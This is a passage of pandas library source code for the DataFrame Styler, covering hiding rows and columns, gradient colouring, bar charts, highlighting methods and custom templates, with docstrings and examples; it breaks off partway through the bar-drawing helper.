        >>> df.style.format("{:.1f}").hide(subset=(slice(None), ["a", "c"])).hide()
        ...   # doctest: +SKIP
                         x                    y
           a      b      c      a      b      c
         0.7    1.0    1.3    1.5   -0.0   -0.2
        -0.6    1.2    1.8    1.9    0.3    0.3
        Hide a specific level:
        >>> df.style.format("{:,.1f}").hide(level=1)  # doctest: +SKIP
                             x                    y
               a      b      c      a      b      c
        x    0.1    0.0    0.4    1.3    0.6   -1.4
             0.7    1.0    1.3    1.5   -0.0   -0.2
             1.4   -0.8    1.6   -0.2   -0.4   -0.3
        y    0.4    1.0   -0.2   -0.8   -1.2    1.1
            -0.6    1.2    1.8    1.9    0.3    0.3
             0.8    0.5   -0.3    1.2    2.2   -0.8
        Hiding just the index level names:
        >>> df.index.names = ["lev0", "lev1"]
        >>> df.style.format("{:,.1f}").hide(names=True)  # doctest: +SKIP
                                 x                    y
                   a      b      c      a      b      c
        x   a    0.1    0.0    0.4    1.3    0.6   -1.4
            b    0.7    1.0    1.3    1.5   -0.0   -0.2
            c    1.4   -0.8    1.6   -0.2   -0.4   -0.3
        y   a    0.4    1.0   -0.2   -0.8   -1.2    1.1
            b   -0.6    1.2    1.8    1.9    0.3    0.3
            c    0.8    0.5   -0.3    1.2    2.2   -0.8
        Examples all produce equivalently transposed effects with ``axis="columns"``.
        """
        axis = self.data._get_axis_number(axis)
        # Resolve the attribute-name fragments used for setattr below:
        # ``obj`` for names, ``objs`` for level flags, ``alt`` for hidden elements.
        if axis == 0:
            obj, objs, alt = "index", "index", "rows"
        else:
            obj, objs, alt = "column", "columns", "columns"
        if level is not None and subset is not None:
            raise ValueError("`subset` and `level` cannot be passed simultaneously")
        if subset is None:
            if level is None and names:
                # this combination implies user shows the index and hides just names
                setattr(self, f"hide_{obj}_names", True)
                return self
            # Hide the whole axis, or just the requested MultiIndex levels, by
            # recording a per-level boolean mask.
            levels_ = refactor_levels(level, getattr(self, objs))
            setattr(
                self,
                f"hide_{objs}_",
                [
                    True if lev in levels_ else False
                    for lev in range(getattr(self, objs).nlevels)
                ],
            )
        else:
            # Hide only the selected rows/columns: resolve the subset against the
            # data and record the positional indices of the hidden elements.
            if axis == 0:
                subset_ = IndexSlice[subset, :]  # new var so mypy reads not Optional
            else:
                subset_ = IndexSlice[:, subset]  # new var so mypy reads not Optional
            subset = non_reducing_slice(subset_)
            hide = self.data.loc[subset]
            h_els = getattr(self, objs).get_indexer_for(getattr(hide, objs))
            setattr(self, f"hidden_{alt}", h_els)
        if names:
            setattr(self, f"hide_{obj}_names", True)
        return self
# -----------------------------------------------------------------------
# A collection of "builtin" styles
# -----------------------------------------------------------------------
    @doc(
        name="background",
        alt="text",
        image_prefix="bg",
        axis="{0 or 'index', 1 or 'columns', None}",
        text_threshold="",
    )
    @Substitution(subset=subset)
    def background_gradient(
        self,
        cmap="PuBu",
        low: float = 0,
        high: float = 0,
        axis: Axis | None = 0,
        subset: Subset | None = None,
        text_color_threshold: float = 0.408,
        vmin: float | None = None,
        vmax: float | None = None,
        gmap: Sequence | None = None,
    ) -> Styler:
        """
        Color the {name} in a gradient style.
        The {name} color is determined according
        to the data in each column, row or frame, or by a given
        gradient map. Requires matplotlib.
        Parameters
        ----------
        cmap : str or colormap
            Matplotlib colormap.
        low : float
            Compress the color range at the low end. This is a multiple of the data
            range to extend below the minimum; good values usually in [0, 1],
            defaults to 0.
        high : float
            Compress the color range at the high end. This is a multiple of the data
            range to extend above the maximum; good values usually in [0, 1],
            defaults to 0.
        axis : {axis}, default 0
            Apply to each column (``axis=0`` or ``'index'``), to each row
            (``axis=1`` or ``'columns'``), or to the entire DataFrame at once
            with ``axis=None``.
        %(subset)s
        text_color_threshold : float or int
            {text_threshold}
            Luminance threshold for determining text color in [0, 1]. Facilitates text
            visibility across varying background colors. All text is dark if 0, and
            light if 1, defaults to 0.408.
        vmin : float, optional
            Minimum data value that corresponds to colormap minimum value.
            If not specified the minimum value of the data (or gmap) will be used.
            .. versionadded:: 1.0.0
        vmax : float, optional
            Maximum data value that corresponds to colormap maximum value.
            If not specified the maximum value of the data (or gmap) will be used.
            .. versionadded:: 1.0.0
        gmap : array-like, optional
            Gradient map for determining the {name} colors. If not supplied
            will use the underlying data from rows, columns or frame. If given as an
            ndarray or list-like must be an identical shape to the underlying data
            considering ``axis`` and ``subset``. If given as DataFrame or Series must
            have same index and column labels considering ``axis`` and ``subset``.
            If supplied, ``vmin`` and ``vmax`` should be given relative to this
            gradient map.
            .. versionadded:: 1.3.0
        Returns
        -------
        self : Styler
        See Also
        --------
        Styler.{alt}_gradient: Color the {alt} in a gradient style.
        Notes
        -----
        When using ``low`` and ``high`` the range
        of the gradient, given by the data if ``gmap`` is not given or by ``gmap``,
        is extended at the low end effectively by
        `map.min - low * map.range` and at the high end by
        `map.max + high * map.range` before the colors are normalized and determined.
        If combining with ``vmin`` and ``vmax`` the `map.min`, `map.max` and
        `map.range` are replaced by values according to the values derived from
        ``vmin`` and ``vmax``.
        This method will preselect numeric columns and ignore non-numeric columns
        unless a ``gmap`` is supplied in which case no preselection occurs.
        Examples
        --------
        >>> df = pd.DataFrame(columns=["City", "Temp (c)", "Rain (mm)", "Wind (m/s)"],
        ...                   data=[["Stockholm", 21.6, 5.0, 3.2],
        ...                         ["Oslo", 22.4, 13.3, 3.1],
        ...                         ["Copenhagen", 24.5, 0.0, 6.7]])
        Shading the values column-wise, with ``axis=0``, preselecting numeric columns
        >>> df.style.{name}_gradient(axis=0)  # doctest: +SKIP
        .. figure:: ../../_static/style/{image_prefix}_ax0.png
        Shading all values collectively using ``axis=None``
        >>> df.style.{name}_gradient(axis=None)  # doctest: +SKIP
        .. figure:: ../../_static/style/{image_prefix}_axNone.png
        Compress the color map from the both ``low`` and ``high`` ends
        >>> df.style.{name}_gradient(axis=None, low=0.75, high=1.0)  # doctest: +SKIP
        .. figure:: ../../_static/style/{image_prefix}_axNone_lowhigh.png
        Manually setting ``vmin`` and ``vmax`` gradient thresholds
        >>> df.style.{name}_gradient(axis=None, vmin=6.7, vmax=21.6)  # doctest: +SKIP
        .. figure:: ../../_static/style/{image_prefix}_axNone_vminvmax.png
        Setting a ``gmap`` and applying to all columns with another ``cmap``
        >>> df.style.{name}_gradient(axis=0, gmap=df['Temp (c)'], cmap='YlOrRd')
        ...  # doctest: +SKIP
        .. figure:: ../../_static/style/{image_prefix}_gmap.png
        Setting the gradient map for a dataframe (i.e. ``axis=None``), we need to
        explicitly state ``subset`` to match the ``gmap`` shape
        >>> gmap = np.array([[1,2,3], [2,3,4], [3,4,5]])
        >>> df.style.{name}_gradient(axis=None, gmap=gmap,
        ...     cmap='YlOrRd', subset=['Temp (c)', 'Rain (mm)', 'Wind (m/s)']
        ... )  # doctest: +SKIP
        .. figure:: ../../_static/style/{image_prefix}_axNone_gmap.png
        """
        # Without an explicit subset or gradient map, restrict to numeric columns
        # so non-numeric data does not break the colour computation.
        if subset is None and gmap is None:
            subset = self.data.select_dtypes(include=np.number).columns
        self.apply(
            _background_gradient,
            cmap=cmap,
            subset=subset,
            axis=axis,
            low=low,
            high=high,
            text_color_threshold=text_color_threshold,
            vmin=vmin,
            vmax=vmax,
            gmap=gmap,
        )
        return self
@doc(
background_gradient,
name="text",
alt="background",
image_prefix="tg",
axis="{0 or 'index', 1 or 'columns', None}",
text_threshold="This argument is ignored (only used in `background_gradient`).",
)
def text_gradient(
self,
cmap="PuBu",
low: float = 0,
high: float = 0,
axis: Axis | None = 0,
subset: Subset | None = None,
vmin: float | None = None,
vmax: float | None = None,
gmap: Sequence | None = None,
) -> Styler:
if subset is None and gmap is None:
subset = self.data.select_dtypes(include=np.number).columns
return self.apply(
_background_gradient,
cmap=cmap,
subset=subset,
axis=axis,
low=low,
high=high,
vmin=vmin,
vmax=vmax,
gmap=gmap,
text_only=True,
)
@Substitution(subset=subset)
def set_properties(self, subset: Subset | None = None, **kwargs) -> Styler:
"""
Set defined CSS-properties to each ``<td>`` HTML element within the given
subset.
Parameters
----------
%(subset)s
**kwargs : dict
A dictionary of property, value pairs to be set for each cell.
Returns
-------
self : Styler
Notes
-----
This is a convenience methods which wraps the :meth:`Styler.applymap` calling a
function returning the CSS-properties independently of the data.
Examples
--------
>>> df = pd.DataFrame(np.random.randn(10, 4))
>>> df.style.set_properties(color="white", align="right") # doctest: +SKIP
>>> df.style.set_properties(**{'background-color': 'yellow'}) # doctest: +SKIP
See `Table Visualization <../../user_guide/style.ipynb>`_ user guide for
more details.
"""
values = "".join([f"{p}: {v};" for p, v in kwargs.items()])
return self.applymap(lambda x: values, subset=subset)
@Substitution(subset=subset)
def bar(
self,
subset: Subset | None = None,
axis: Axis | None = 0,
*,
color: str | list | tuple | None = None,
cmap: Any | None = None,
width: float = 100,
height: float = 100,
align: str | float | int | Callable = "mid",
vmin: float | None = None,
vmax: float | None = None,
props: str = "width: 10em;",
) -> Styler:
"""
Draw bar chart in the cell backgrounds.
.. versionchanged:: 1.4.0
Parameters
----------
%(subset)s
axis : {0 or 'index', 1 or 'columns', None}, default 0
Apply to each column (``axis=0`` or ``'index'``), to each row
(``axis=1`` or ``'columns'``), or to the entire DataFrame at once
with ``axis=None``.
color : str or 2-tuple/list
If a str is passed, the color is the same for both
negative and positive numbers. If 2-tuple/list is used, the
first element is the color_negative and the second is the
color_positive (eg: ['#d65f5f', '#5fba7d']).
cmap : str, matplotlib.cm.ColorMap
A string name of a matplotlib Colormap, or a Colormap object. Cannot be
used together with ``color``.
.. versionadded:: 1.4.0
width : float, default 100
The percentage of the cell, measured from the left, in which to draw the
bars, in [0, 100].
height : float, default 100
The percentage height of the bar in the cell, centrally aligned, in [0,100].
.. versionadded:: 1.4.0
align : str, int, float, callable, default 'mid'
How to align the bars within the cells relative to a width adjusted center.
If string must be one of:
- 'left' : bars are drawn rightwards from the minimum data value.
- 'right' : bars are drawn leftwards from the maximum data value.
- 'zero' : a value of zero is located at the center of the cell.
- 'mid' : a value of (max-min)/2 is located at the center of the cell,
or if all values are negative (positive) the zero is
aligned at the right (left) of the cell.
- 'mean' : the mean value of the data is located at the center of the cell.
If a float or integer is given this will indicate the center of the cell.
If a callable should take a 1d or 2d array and return a scalar.
.. versionchanged:: 1.4.0
vmin : float, optional
Minimum bar value, defining the left hand limit
of the bar drawing range, lower values are clipped to `vmin`.
When None (default): the minimum value of the data will be used.
vmax : float, optional
Maximum bar value, defining the right hand limit
of the bar drawing range, higher values are clipped to `vmax`.
When None (default): the maximum value of the data will be used.
props : str, optional
The base CSS of the cell that is extended to add the bar chart. Defaults to
`"width: 10em;"`.
.. versionadded:: 1.4.0
Returns
-------
self : Styler
Notes
-----
This section of the user guide:
`Table Visualization <../../user_guide/style.ipynb>`_ gives
a number of examples for different settings and color coordination.
"""
if color is None and cmap is None:
color = "#d65f5f"
elif color is not None and cmap is not None:
raise ValueError("`color` and `cmap` cannot both be given")
elif color is not None:
if (isinstance(color, (list, tuple)) and len(color) > 2) or not isinstance(
color, (str, list, tuple)
):
raise ValueError(
"`color` must be string or list or tuple of 2 strings,"
"(eg: color=['#d65f5f', '#5fba7d'])"
)
if not (0 <= width <= 100):
raise ValueError(f"`width` must be a value in [0, 100], got {width}")
elif not (0 <= height <= 100):
raise ValueError(f"`height` must be a value in [0, 100], got {height}")
if subset is None:
subset = self.data.select_dtypes(include=np.number).columns
self.apply(
_bar,
subset=subset,
axis=axis,
align=align,
colors=color,
cmap=cmap,
width=width / 100,
height=height / 100,
vmin=vmin,
vmax=vmax,
base_css=props,
)
return self
@Substitution(subset=subset, props=props)
def highlight_null(
self,
null_color: str = "red",
subset: Subset | None = None,
props: str | None = None,
) -> Styler:
"""
Highlight missing values with a style.
Parameters
----------
null_color : str, default 'red'
%(subset)s
.. versionadded:: 1.1.0
%(props)s
.. versionadded:: 1.3.0
Returns
-------
self : Styler
See Also
--------
Styler.highlight_max: Highlight the maximum with a style.
Styler.highlight_min: Highlight the minimum with a style.
Styler.highlight_between: Highlight a defined range with a style.
Styler.highlight_quantile: Highlight values defined by a quantile with a style.
"""
def f(data: DataFrame, props: str) -> np.ndarray:
return np.where(pd.isna(data).to_numpy(), props, "")
if props is None:
props = f"background-color: {null_color};"
return self.apply(f, axis=None, subset=subset, props=props)
@Substitution(subset=subset, props=props)
def highlight_max(
self,
subset: Subset | None = None,
color: str = "yellow",
axis: Axis | None = 0,
props: str | None = None,
) -> Styler:
"""
Highlight the maximum with a style.
Parameters
----------
%(subset)s
color : str, default 'yellow'
Background color to use for highlighting.
axis : {0 or 'index', 1 or 'columns', None}, default 0
Apply to each column (``axis=0`` or ``'index'``), to each row
(``axis=1`` or ``'columns'``), or to the entire DataFrame at once
with ``axis=None``.
%(props)s
.. versionadded:: 1.3.0
Returns
-------
self : Styler
See Also
--------
Styler.highlight_null: Highlight missing values with a style.
Styler.highlight_min: Highlight the minimum with a style.
Styler.highlight_between: Highlight a defined range with a style.
Styler.highlight_quantile: Highlight values defined by a quantile with a style.
"""
if props is None:
props = f"background-color: {color};"
return self.apply(
partial(_highlight_value, op="max"),
axis=axis,
subset=subset,
props=props,
)
@Substitution(subset=subset, props=props)
def highlight_min(
self,
subset: Subset | None = None,
color: str = "yellow",
axis: Axis | None = 0,
props: str | None = None,
) -> Styler:
"""
Highlight the minimum with a style.
Parameters
----------
%(subset)s
color : str, default 'yellow'
Background color to use for highlighting.
axis : {0 or 'index', 1 or 'columns', None}, default 0
Apply to each column (``axis=0`` or ``'index'``), to each row
(``axis=1`` or ``'columns'``), or to the entire DataFrame at once
with ``axis=None``.
%(props)s
.. versionadded:: 1.3.0
Returns
-------
self : Styler
See Also
--------
Styler.highlight_null: Highlight missing values with a style.
Styler.highlight_max: Highlight the maximum with a style.
Styler.highlight_between: Highlight a defined range with a style.
Styler.highlight_quantile: Highlight values defined by a quantile with a style.
"""
if props is None:
props = f"background-color: {color};"
return self.apply(
partial(_highlight_value, op="min"),
axis=axis,
subset=subset,
props=props,
)
    @Substitution(subset=subset, props=props)
    def highlight_between(
        self,
        subset: Subset | None = None,
        color: str = "yellow",
        axis: Axis | None = 0,
        left: Scalar | Sequence | None = None,
        right: Scalar | Sequence | None = None,
        inclusive: str = "both",
        props: str | None = None,
    ) -> Styler:
        """
        Highlight a defined range with a style.
        .. versionadded:: 1.3.0
        Parameters
        ----------
        %(subset)s
        color : str, default 'yellow'
            Background color to use for highlighting.
        axis : {0 or 'index', 1 or 'columns', None}, default 0
            If ``left`` or ``right`` given as sequence, axis along which to apply those
            boundaries. See examples.
        left : scalar or datetime-like, or sequence or array-like, default None
            Left bound for defining the range.
        right : scalar or datetime-like, or sequence or array-like, default None
            Right bound for defining the range.
        inclusive : {'both', 'neither', 'left', 'right'}
            Identify whether bounds are closed or open.
        %(props)s
        Returns
        -------
        self : Styler
        See Also
        --------
        Styler.highlight_null: Highlight missing values with a style.
        Styler.highlight_max: Highlight the maximum with a style.
        Styler.highlight_min: Highlight the minimum with a style.
        Styler.highlight_quantile: Highlight values defined by a quantile with a style.
        Notes
        -----
        If ``left`` is ``None`` only the right bound is applied.
        If ``right`` is ``None`` only the left bound is applied. If both are ``None``
        all values are highlighted.
        ``axis`` is only needed if ``left`` or ``right`` are provided as a sequence or
        an array-like object for aligning the shapes. If ``left`` and ``right`` are
        both scalars then all ``axis`` inputs will give the same result.
        This function only works with compatible ``dtypes``. For example a datetime-like
        region can only use equivalent datetime-like ``left`` and ``right`` arguments.
        Use ``subset`` to control regions which have multiple ``dtypes``.
        Examples
        --------
        Basic usage
        >>> df = pd.DataFrame({
        ...     'One': [1.2, 1.6, 1.5],
        ...     'Two': [2.9, 2.1, 2.5],
        ...     'Three': [3.1, 3.2, 3.8],
        ... })
        >>> df.style.highlight_between(left=2.1, right=2.9)  # doctest: +SKIP
        .. figure:: ../../_static/style/hbetw_basic.png
        Using a range input sequence along an ``axis``, in this case setting a ``left``
        and ``right`` for each column individually
        >>> df.style.highlight_between(left=[1.4, 2.4, 3.4], right=[1.6, 2.6, 3.6],
        ...     axis=1, color="#fffd75")  # doctest: +SKIP
        .. figure:: ../../_static/style/hbetw_seq.png
        Using ``axis=None`` and providing the ``left`` argument as an array that
        matches the input DataFrame, with a constant ``right``
        >>> df.style.highlight_between(left=[[2,2,3],[2,2,3],[3,3,3]], right=3.5,
        ...     axis=None, color="#fffd75")  # doctest: +SKIP
        .. figure:: ../../_static/style/hbetw_axNone.png
        Using ``props`` instead of default background coloring
        >>> df.style.highlight_between(left=1.5, right=3.5,
        ...     props='font-weight:bold;color:#e83e8c')  # doctest: +SKIP
        .. figure:: ../../_static/style/hbetw_props.png
        """
        if props is None:
            props = f"background-color: {color};"
        # Delegate the element-wise interval test to the module-level helper.
        return self.apply(
            _highlight_between,
            axis=axis,
            subset=subset,
            props=props,
            left=left,
            right=right,
            inclusive=inclusive,
        )
    @Substitution(subset=subset, props=props)
    def highlight_quantile(
        self,
        subset: Subset | None = None,
        color: str = "yellow",
        axis: Axis | None = 0,
        q_left: float = 0.0,
        q_right: float = 1.0,
        interpolation: str = "linear",
        inclusive: str = "both",
        props: str | None = None,
    ) -> Styler:
        """
        Highlight values defined by a quantile with a style.
        .. versionadded:: 1.3.0
        Parameters
        ----------
        %(subset)s
        color : str, default 'yellow'
            Background color to use for highlighting.
        axis : {0 or 'index', 1 or 'columns', None}, default 0
            Axis along which to determine and highlight quantiles. If ``None`` quantiles
            are measured over the entire DataFrame. See examples.
        q_left : float, default 0
            Left bound, in [0, q_right), for the target quantile range.
        q_right : float, default 1
            Right bound, in (q_left, 1], for the target quantile range.
        interpolation : {‘linear’, ‘lower’, ‘higher’, ‘midpoint’, ‘nearest’}
            Argument passed to ``Series.quantile`` or ``DataFrame.quantile`` for
            quantile estimation.
        inclusive : {'both', 'neither', 'left', 'right'}
            Identify whether quantile bounds are closed or open.
        %(props)s
        Returns
        -------
        self : Styler
        See Also
        --------
        Styler.highlight_null: Highlight missing values with a style.
        Styler.highlight_max: Highlight the maximum with a style.
        Styler.highlight_min: Highlight the minimum with a style.
        Styler.highlight_between: Highlight a defined range with a style.
        Notes
        -----
        This function does not work with ``str`` dtypes.
        Examples
        --------
        Using ``axis=None`` and apply a quantile to all collective data
        >>> df = pd.DataFrame(np.arange(10).reshape(2,5) + 1)
        >>> df.style.highlight_quantile(axis=None, q_left=0.8, color="#fffd75")
        ... # doctest: +SKIP
        .. figure:: ../../_static/style/hq_axNone.png
        Or highlight quantiles row-wise or column-wise, in this case by row-wise
        >>> df.style.highlight_quantile(axis=1, q_left=0.8, color="#fffd75")
        ... # doctest: +SKIP
        .. figure:: ../../_static/style/hq_ax1.png
        Use ``props`` instead of default background coloring
        >>> df.style.highlight_quantile(axis=None, q_left=0.2, q_right=0.8,
        ...     props='font-weight:bold;color:#e83e8c') # doctest: +SKIP
        .. figure:: ../../_static/style/hq_props.png
        """
        # normalize the subset to a non-reducing indexer so that ``.loc``
        # keeps the data 2-dimensional (or take the full data when no
        # subset is given)
        subset_ = slice(None) if subset is None else subset
        subset_ = non_reducing_slice(subset_)
        data = self.data.loc[subset_]
        # after quantile is found along axis, e.g. along rows,
        # applying the calculated quantile to alternate axis, e.g. to each column
        kwargs = {"q": [q_left, q_right], "interpolation": interpolation}
        if axis is None:
            # quantiles over the flattened values: a single (left, right)
            # pair for the whole table
            q = Series(data.to_numpy().ravel()).quantile(**kwargs)
            axis_apply: int | None = None
        else:
            axis = self.data._get_axis_number(axis)
            q = data.quantile(axis=axis, numeric_only=False, **kwargs)
            # bounds computed along one axis are applied along the other
            axis_apply = 1 - axis
        if props is None:
            props = f"background-color: {color};"
        # delegate to the generic range highlighter with the quantile
        # values as left/right bounds
        return self.apply(
            _highlight_between,
            axis=axis_apply,
            subset=subset,
            props=props,
            left=q.iloc[0],
            right=q.iloc[1],
            inclusive=inclusive,
        )
@classmethod
def from_custom_template(
cls, searchpath, html_table: str | None = None, html_style: str | None = None
):
"""
Factory function for creating a subclass of ``Styler``.
Uses custom templates and Jinja environment.
.. versionchanged:: 1.3.0
Parameters
----------
searchpath : str or list
Path or paths of directories containing the templates.
html_table : str
Name of your custom template to replace the html_table template.
.. versionadded:: 1.3.0
html_style : str
Name of your custom template to replace the html_style template.
.. versionadded:: 1.3.0
Returns
-------
MyStyler : subclass of Styler
Has the correct ``env``,``template_html``, ``template_html_table`` and
``template_html_style`` class attributes set.
"""
loader = jinja2.ChoiceLoader([jinja2.FileSystemLoader(searchpath), cls.loader])
# mypy doesn't like dynamically-defined classes
# error: Variable "cls" is not valid as a type
# error: Invalid base class "cls"
class MyStyler(cls): # type:ignore[valid-type,misc]
env = jinja2.Environment(loader=loader)
if html_table:
template_html_table = env.get_template(html_table)
if html_style:
template_html_style = env.get_template(html_style)
return MyStyler
def pipe(self, func: Callable, *args, **kwargs):
"""
Apply ``func(self, *args, **kwargs)``, and return the result.
Parameters
----------
func : function
Function to apply to the Styler. Alternatively, a
``(callable, keyword)`` tuple where ``keyword`` is a string
indicating the keyword of ``callable`` that expects the Styler.
*args : optional
Arguments passed to `func`.
**kwargs : optional
A dictionary of keyword arguments passed into ``func``.
Returns
-------
object :
The value returned by ``func``.
See Also
--------
DataFrame.pipe : Analogous method for DataFrame.
Styler.apply : Apply a CSS-styling function column-wise, row-wise, or
table-wise.
Notes
-----
Like :meth:`DataFrame.pipe`, this method can simplify the
application of several user-defined functions to a styler. Instead
of writing:
.. code-block:: python
f(g(df.style.set_precision(3), arg1=a), arg2=b, arg3=c)
users can write:
.. code-block:: python
(df.style.set_precision(3)
.pipe(g, arg1=a)
.pipe(f, arg2=b, arg3=c))
In particular, this allows users to define functions that take a
styler object, along with other parameters, and return the styler after
making styling changes (such as calling :meth:`Styler.apply` or
:meth:`Styler.set_properties`). Using ``.pipe``, these user-defined
style "transformations" can be interleaved with calls to the built-in
Styler interface.
Examples
--------
>>> def format_conversion(styler):
... return (styler.set_properties(**{'text-align': 'right'})
... .format({'conversion': '{:.1%}'}))
The user-defined ``format_conversion`` function above can be called
within a sequence of other style modifications:
>>> df = pd.DataFrame({'trial': list(range(5)),
... 'conversion': [0.75, 0.85, np.nan, 0.7, 0.72]})
>>> (df.style
... .highlight_min(subset=['conversion'], color='yellow')
... .pipe(format_conversion)
... .set_caption("Results with minimum conversion highlighted."))
... # doctest: +SKIP
.. figure:: ../../_static/style/df_pipe.png
"""
return com.pipe(self, func, *args, **kwargs)
def _validate_apply_axis_arg(
arg: NDFrame | Sequence | np.ndarray,
arg_name: str,
dtype: Any | None,
data: NDFrame,
) -> np.ndarray:
"""
For the apply-type methods, ``axis=None`` creates ``data`` as DataFrame, and for
``axis=[1,0]`` it creates a Series. Where ``arg`` is expected as an element
of some operator with ``data`` we must make sure that the two are compatible shapes,
or raise.
Parameters
----------
arg : sequence, Series or DataFrame
the user input arg
arg_name : string
name of the arg for use in error messages
dtype : numpy dtype, optional
forced numpy dtype if given
data : Series or DataFrame
underling subset of Styler data on which operations are performed
Returns
-------
ndarray
"""
dtype = {"dtype": dtype} if dtype else {}
# raise if input is wrong for axis:
if isinstance(arg, Series) and isinstance(data, DataFrame):
raise ValueError(
f"'{arg_name}' is a Series but underlying data for operations "
f"is a DataFrame since 'axis=None'"
)
elif isinstance(arg, DataFrame) and isinstance(data, Series):
raise ValueError(
f"'{arg_name}' is a DataFrame but underlying data for "
f"operations is a Series with 'axis in [0,1]'"
)
elif isinstance(arg, (Series, DataFrame)): # align indx / cols to data
arg = arg.reindex_like(data, method=None).to_numpy(**dtype)
else:
arg = np.asarray(arg, **dtype)
assert isinstance(arg, np.ndarray) # mypy requirement
if arg.shape != data.shape: # check valid input
raise ValueError(
f"supplied '{arg_name}' is not correct shape for data over "
f"selected 'axis': got {arg.shape}, "
f"expected {data.shape}"
)
return arg
def _background_gradient(
    data,
    cmap="PuBu",
    low: float = 0,
    high: float = 0,
    text_color_threshold: float = 0.408,
    vmin: float | None = None,
    vmax: float | None = None,
    gmap: Sequence | np.ndarray | DataFrame | Series | None = None,
    text_only: bool = False,
):
    """
    Color background in a range according to the data or a gradient map
    """
    if gmap is None:  # the data itself is used as the gradient map
        gmap = data.to_numpy(dtype=float)
    else:  # else validate gmap against the underlying data
        gmap = _validate_apply_axis_arg(gmap, "gmap", float, data)
    with _mpl(Styler.background_gradient) as (plt, mpl):
        # color window over the gradient map; vmin/vmax override the
        # observed extremes
        smin = np.nanmin(gmap) if vmin is None else vmin
        smax = np.nanmax(gmap) if vmax is None else vmax
        rng = smax - smin
        # extend lower / upper bounds, compresses color range
        norm = mpl.colors.Normalize(smin - (rng * low), smax + (rng * high))
        rgbas = plt.cm.get_cmap(cmap)(norm(gmap))
        def relative_luminance(rgba) -> float:
            """
            Calculate relative luminance of a color.
            The calculation adheres to the W3C standards
            (https://www.w3.org/WAI/GL/wiki/Relative_luminance)
            Parameters
            ----------
            color : rgb or rgba tuple
            Returns
            -------
            float
                The relative luminance as a value from 0 to 1
            """
            r, g, b = (
                x / 12.92 if x <= 0.04045 else ((x + 0.055) / 1.055) ** 2.4
                for x in rgba[:3]
            )
            return 0.2126 * r + 0.7152 * g + 0.0722 * b
        def css(rgba, text_only) -> str:
            # choose a text color that contrasts with the computed
            # background, unless only the text itself is being colored
            if not text_only:
                dark = relative_luminance(rgba) < text_color_threshold
                text_color = "#f1f1f1" if dark else "#000000"
                return (
                    f"background-color: {mpl.colors.rgb2hex(rgba)};color: {text_color};"
                )
            else:
                return f"color: {mpl.colors.rgb2hex(rgba)};"
        if data.ndim == 1:
            return [css(rgba, text_only) for rgba in rgbas]
        else:
            return DataFrame(
                [[css(rgba, text_only) for rgba in row] for row in rgbas],
                index=data.index,
                columns=data.columns,
            )
def _highlight_between(
data: NDFrame,
props: str,
left: Scalar | Sequence | np.ndarray | NDFrame | None = None,
right: Scalar | Sequence | np.ndarray | NDFrame | None = None,
inclusive: bool | str = True,
) -> np.ndarray:
"""
Return an array of css props based on condition of data values within given range.
"""
if np.iterable(left) and not isinstance(left, str):
left = _validate_apply_axis_arg(
left, "left", None, data # type: ignore[arg-type]
)
if np.iterable(right) and not isinstance(right, str):
right = _validate_apply_axis_arg(
right, "right", None, data # type: ignore[arg-type]
)
# get ops with correct boundary attribution
if inclusive == "both":
ops = (operator.ge, operator.le)
elif inclusive == "neither":
ops = (operator.gt, operator.lt)
elif inclusive == "left":
ops = (operator.ge, operator.lt)
elif inclusive == "right":
ops = (operator.gt, operator.le)
else:
raise ValueError(
f"'inclusive' values can be 'both', 'left', 'right', or 'neither' "
f"got {inclusive}"
)
g_left = (
ops[0](data, left)
if left is not None
else np.full(data.shape, True, dtype=bool)
)
l_right = (
ops[1](data, right)
if right is not None
else np.full(data.shape, True, dtype=bool)
)
return np.where(g_left & l_right, props, "")
def _highlight_value(data: DataFrame | Series, op: str, props: str) -> np.ndarray:
"""
Return an array of css strings based on the condition of values matching an op.
"""
value = getattr(data, op)(skipna=True)
if isinstance(data, DataFrame): # min/max must be done twice to return scalar
value = getattr(value, op)(skipna=True)
return np.where(data == value, props, "")
def _bar(
    data: NDFrame,
    align: str | float | int | Callable,
    colors: str | list | tuple,
    cmap: Any,
    width: float,
    height: float,
    vmin: float | None,
    vmax: float | None,
    base_css: str,
):
    """
    Draw bar chart in data cells using HTML CSS linear gradient.
    Parameters
    ----------
    data : Series or DataFrame
        Underling subset of Styler data on which operations are performed.
    align : str in {"left", "right", "mid", "zero", "mean"}, int, float, callable
        Method for how bars are structured or scalar value of centre point.
    colors : list-like of str
        Two listed colors as string in valid CSS.
    cmap : str or matplotlib colormap, optional
        If given, overrides ``colors`` with colormap-derived bar colors.
    width : float in [0,1]
        The percentage of the cell, measured from left, where drawn bars will reside.
    height : float in [0,1]
        The percentage of the cell's height where drawn bars will reside, centrally
        aligned.
    vmin : float, optional
        Overwrite the minimum value of the window.
    vmax : float, optional
        Overwrite the maximum value of the window.
    base_css : str
        Additional CSS that is included in the cell before bars are drawn.
    """
    def css_bar(start: float, end: float, color: str) -> str:
        """
        Generate CSS code to draw a bar from start to end in a table cell.
        Uses linear-gradient.
        Parameters
        ----------
        start : float
            Relative positional start of bar coloring in [0,1]
        end : float
            Relative positional end of the bar coloring in [0,1]
        color : str
            CSS valid color to apply.
        Returns
        -------
        str : The CSS applicable to the cell.
        Notes
        -----
        Uses ``base_css`` from outer scope.
        """
        cell_css = base_css
        if end > start:
            cell_css += "background: linear-gradient(90deg,"
            if start > 0:
                cell_css += f" transparent {start*100:.1f}%, {color} {start*100:.1f}%,"
            cell_css += f" {color} {end*100:.1f}%, transparent {end*100:.1f}%)"
        return cell_css
    def css_calc(x, left: float, right: float, align: str, color: str | list | tuple):
        """
        Return the correct CSS for bar placement based on calculated values.
        Parameters
        ----------
        x : float
            Value which determines the bar placement.
        left : float
            Value marking the left side of calculation, usually minimum of data.
        right : float
            Value marking the right side of the calculation, usually maximum of data
            (left < right).
        align : {"left", "right", "zero", "mid"}
            How the bars will be positioned.
            "left", "right", "zero" can be used with any values for ``left``, ``right``.
            "mid" can only be used where ``left <= 0`` and ``right >= 0``.
            "zero" is used to specify a center when all values ``x``, ``left``,
            ``right`` are translated, e.g. by say a mean or median.
        Returns
        -------
        str : Resultant CSS with linear gradient.
        Notes
        -----
        Uses ``colors``, ``width`` and ``height`` from outer scope.
        """
        if pd.isna(x):
            return base_css
        if isinstance(color, (list, tuple)):
            # two-color form: first color for negative values, second for
            # non-negative values
            color = color[0] if x < 0 else color[1]
        assert isinstance(color, str)  # mypy redefinition
        x = left if x < left else x
        x = right if x > right else x  # trim data if outside of the window
        start: float = 0
        end: float = 1
        if align == "left":
            # all proportions are measured from the left side between left and right
            end = (x - left) / (right - left)
        elif align == "right":
            # all proportions are measured from the right side between left and right
            start = (x - left) / (right - left)
        else:
